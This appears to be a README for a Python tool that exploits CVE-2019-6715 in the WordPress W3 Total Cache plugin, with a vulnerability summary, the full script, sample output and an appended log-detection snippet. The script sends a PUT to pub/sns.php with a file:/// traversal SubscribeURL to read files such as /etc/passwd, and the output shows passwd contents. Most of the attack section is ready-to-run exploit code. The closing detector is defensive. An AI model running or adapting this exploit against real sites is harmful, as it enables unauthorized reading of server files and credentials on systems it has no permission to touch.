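Related vulnerability
Title: WordPress W3 Total Cache plugin information disclosure vulnerability (CVE-2019-6715)
Description: WordPress is a blogging platform developed in PHP by the WordPress Foundation. It supports setting up personal blog sites on servers running PHP and MySQL. The W3 Total Cache plugin is an SEO (search engine optimization) plugin used with it. The pub/sns.php file in versions of the WordPress W3 Total Cache plugin before 0.9.4 has an information disclosure vulnerability. The vulnerability stems from configuration or similar errors made while the network system or product is running. An unauthorized attacker can exploit it to obtain sensitive information from the affected component.
Description
Testing for CVE-2019-6715 (Arbitrary File Read)/ CVE-2024-12365 (SSRF/Info Disclosure)
Introduction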
# W3TotalChache
Testing for CVE-2019-6715 (Arbitrary File Read)/ CVE-2024-12365 (SSRF/Info Disclosure)
Usage:

```
python3 w3tc_scanner.py -u https://example.com -f /etc/passwd -d 3
```
```python
import argparse
import re
from urllib.parse import urlparse

import requests


def version_tuple(version):
    # Compare versions numerically; plain string comparison misorders
    # values such as "2.10.0" and "2.8.1".
    return tuple(int(part) for part in re.findall(r'\d+', version))


def check_w3tc_version(url):
    try:
        response = requests.get(url, timeout=10)
        headers = response.headers

        # Check X-Powered-By header
        if 'X-Powered-By' in headers and 'W3 Total Cache' in headers['X-Powered-By']:
            version = headers['X-Powered-By'].split('/')[-1]
            return version

        # Check HTML content for version
        if 'W3 Total Cache' in response.text:
            version = response.text.split('W3 Total Cache/')[-1].split()[0][:5]
            return version

        return None
    except Exception as e:
        print(f"Version check error: {str(e)}")
        return None


def test_file_read(target_url, file_path="/etc/passwd", depth=2):
    try:
        parsed = urlparse(target_url)
        base_url = f"{parsed.scheme}://{parsed.netloc}"
        traversal = '../' * depth

        # pub/sns.php is the plugin endpoint that handles SNS messages
        exploit_url = f"{base_url}/wp-content/plugins/w3-total-cache/pub/sns.php"
        payload = {
            "Type": "SubscriptionConfirmation",
            "Message": "",
            "SubscribeURL": f"file:///{traversal}{file_path}"
        }

        headers = {'Content-Type': 'application/json'}
        response = requests.put(exploit_url, json=payload, headers=headers, timeout=15)

        # Any non-empty 200 response is treated as a successful read
        if response.status_code == 200 and len(response.text) > 0:
            return True, response.text
        return False, None
    except Exception as e:
        print(f"File read test error: {str(e)}")
        return False, None


def main():
    parser = argparse.ArgumentParser(description='W3 Total Cache Vulnerability Scanner')
    parser.add_argument('-u', '--url', required=True, help='Target URL')
    parser.add_argument('-f', '--file', default="/etc/passwd",
                        help='File to read (default: /etc/passwd)')
    parser.add_argument('-d', '--depth', type=int, default=2,
                        help='Traversal depth (default: 2)')
    args = parser.parse_args()

    print(f"[*] Scanning {args.url}")

    # Version check
    version = check_w3tc_version(args.url)
    if version:
        print(f"[!] Detected W3 Total Cache version: {version}")
        parsed_version = version_tuple(version)
        if parsed_version and parsed_version <= (2, 8, 1):
            print("[!] Vulnerable to CVE-2024-12365 (SSRF/Info Disclosure)")
    else:
        print("[!] W3 Total Cache not detected through headers/content")

    # File read vulnerability test
    print("\n[*] Testing for CVE-2019-6715 (Arbitrary File Read)...")
    vulnerable, content = test_file_read(args.url, args.file, args.depth)
    if vulnerable:
        print(f"[!] Vulnerable to directory traversal!\nFile content:\n{content[:500]}...")
    else:
        print("[+] No immediate file read vulnerability detected")


if __name__ == "__main__":
    main()
```
Output:

```
[*] Scanning https://example.com
[!] Detected W3 Total Cache version: 2.8.0
[!] Vulnerable to CVE-2024-12365 (SSRF/Info Disclosure)
[*] Testing for CVE-2019-6715 (Arbitrary File Read)...
[!] Vulnerable to directory traversal!
File content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
```
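A defender-side check for the request shape the scanner above sends, as an added example that is not part of the original README: it flags logged requests to pub/sns.php whose method or `SubscribeURL` does not look like a genuine SNS delivery. The function name, the sample records and the host pattern `sns.<region>.amazonaws.com` for genuine confirmations are assumptions made for illustration.

```python
import json
import re
from urllib.parse import urlparse

SNS_PATH = "/wp-content/plugins/w3-total-cache/pub/sns.php"  # endpoint named on the page
# Assumption: genuine confirmations point at https://sns.<region>.amazonaws.com/
SNS_HOST = re.compile(r"^sns\.[a-z0-9-]+\.amazonaws\.com(\.cn)?$")


def findings(method, path, body):
    """Return None for unrelated requests, else a list of reasons (empty = looks genuine)."""
    if urlparse(path).path != SNS_PATH:
        return None
    reasons = []
    if method.upper() != "POST":
        reasons.append(f"{method} request (SNS delivers with POST)")
    try:
        msg = json.loads(body)
    except ValueError:
        return reasons + ["body is not JSON"]
    target = msg.get("SubscribeURL") if isinstance(msg, dict) else None
    if target is None:
        return reasons  # no URL for the plugin to fetch
    url = urlparse(str(target))
    if url.scheme != "https":
        reasons.append(f"SubscribeURL scheme {url.scheme!r} is not https")
    elif not SNS_HOST.match(url.hostname or ""):
        reasons.append(f"SubscribeURL host {url.hostname!r} is not an SNS endpoint")
    return reasons


# Constructed sample records (method, path, body), e.g. from a proxy that logs bodies.
SAMPLES = [
    ("POST", SNS_PATH, '{"Type": "SubscriptionConfirmation", "SubscribeURL": '
                       '"https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription"}'),
    ("PUT", SNS_PATH, '{"Type": "SubscriptionConfirmation", "Message": "", '
                      '"SubscribeURL": "file:///../../etc/passwd"}'),
    ("POST", SNS_PATH, '{"Type": "SubscriptionConfirmation", '
                       '"SubscribeURL": "https://example.com/confirm"}'),
    ("GET", "/wp-login.php", ""),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        result = findings(method, path, body)
        if result:
            print(f"ALERT {method} {path}: " + "; ".join(result))
```
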